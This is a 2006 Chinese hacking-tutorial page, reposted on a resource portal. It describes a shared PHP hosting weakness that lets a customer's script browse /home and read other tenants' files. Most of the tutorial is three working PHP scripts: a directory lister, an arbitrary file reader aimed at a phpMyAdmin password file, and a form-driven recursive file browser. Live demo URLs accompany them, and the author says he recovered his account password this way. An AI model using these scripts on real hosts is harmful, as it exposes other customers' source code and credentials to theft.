欢迎光临极品网,更多、更新的资源信息尽在Jpinw.Com!本站所有信息资源每日更新新的内容,请大家继续关注www.Jpinw.com!如果觉得本站还不错,对您有帮助,别忘了向您的朋友推荐本站!请记好本站网址:http://www.Jpinw.com,网站发展靠大家多多的支持!!!

极品网 极品课件 极品论文 极品文学 极品游戏 极品美容 极品手机资源 极品股票

#
免费资源: 免费域名 | 免费空间 | 免费推广 | 免费邮箱 | 免费硬盘 | 免费论坛 | 免费留言 | 免费统计 | 在线投稿 | 更多...
电脑学院: 操作系统 | 安全相关 | 网页设计 | 编程开发 | 建站经验 | 服务器类 | 黑客攻防 | 菜鸟入门 | 教你网赚 | 更多...
文章导航: 网赚学堂 | 网赚秘笈 | 网赚三维 | 网赚先锋 | 网赚资讯 | 感悟网赚 | 众生百态 | 经典美文 | 范文中心 | 更多...
图酷天下: 时事图酷 | 娱乐图酷 | 搞笑图酷 | 时尚图酷 | 体育图酷 | 另类经典 | 论文资源 | 课件下载 | 文学知识 | 更多...

您现在的位置: 极品网 >> 电脑学院 >> 黑客攻防 >> 漏洞研究 >> 教程正文

PHP收费空间的一点小漏洞          【字体:
PHP收费空间的一点小漏洞
作者:佚名    教程来源:不详    点击数:    更新时间:2006-5-26    

 








PHP收费空间的一点小漏洞

大多数(能执行PHP的)收费空间都有此问题
以下以虎翼为例:
代码:
<?
$d=dir("/home");
echo "Handle:".$d->handle."<br>\n";
echo "Path:".$d->path."<br>\n";
while($entry=$d->read())
{
echo $entry."<br>\n";
}
$d->close();
?>

利用此test.php程序可以查看/home下所有文件,可以查看51.net的当前主机的全部用户
把"/home"改成"/"可以看到什么?你自己去看吧.别太紧张.紧张的在后面
HOME下的全是登陆帐号
HOME/.domain和
HOME/.trialdomain
下的全是三级域名
帐号里有很多都没空间,是空号。我反复试了。
三级域名是对应·A型虚拟主机的
例子(没敢用虎翼的)
http://tonylong.l1h.net/test.php
http://tonylong.l1h.net/test1.php
http://tonylong.l1h.net/test2.php
http://tonylong.l1h.net/test3.php

用aa.php读取文件原码
读取。。
<?
$fd=fopen("/home/*.*","r");
while($buffer=fgets($fd,4096))
{
echo $buffer;
}
fclose($fd);
?>
例子读取:/home/html/phpmyadmin/user_password.php的原码(这对网站威胁很大)http://tonylong.l1h.net/aa.php
用ss.php查询指定文件目录下的所有文件和文件夹
<?
function listdir($dir){
echo "<ul>";
$handle=opendir($dir);
echo "directory Handle:$handle<br>\n";
while ($sdir=readdir($handle)){
if(is_file("$dir/$sdir"))
echo "<li>$dir/$sdir";
if(is_dir("$dir/$sdir") and $sdir<>'.' and $sdir<>'..'){
echo "<li>$dir";
listdir("$dir/$sdir");
}
}
closedir($handle);
echo "</ul>";
}

if(!empty($dir)){
listdir($dir);
}
?>

<form action="test.php" method=post>
请输入查询路径:<input type=text name=dir size=50>
<input type=submit value="查询">
</form>
例子http://tonylong.l1h.net/ss.php

以上演示空间是l1h.net的免费空间
大家别攻击

还有perlhack 编的一整套.
反正我自己找到了我的虎翼帐号及密码。

  

 

教程录入:dping    责任编辑:dping 
  • 上一篇教程:

  • 下一篇教程:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    最新热点 最新推荐 相关教程
    Windows XP教程《XP:学用脚
    请问大家***.php文件是用什么
    我的电脑是HP.NX6325,杀毒
    请问有人用过什么杀毒软件杀
    phime2002async和phime2002a
    hp打印机:点击打印,电脑死机
    加载 c:\windows\system32\t
    我的笔记本是HP的,突然蓝屏,
    我在使用PHOTOSHOP时候换了字
    windows vista支持PHOTOSHOP
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    极品网
    | 设为首页 | 加入收藏 | 友情链接 | 版权声明 |
    极品网

    Copyright 2006 Jpinw.com 极品网

    备案号:申请中

    极品网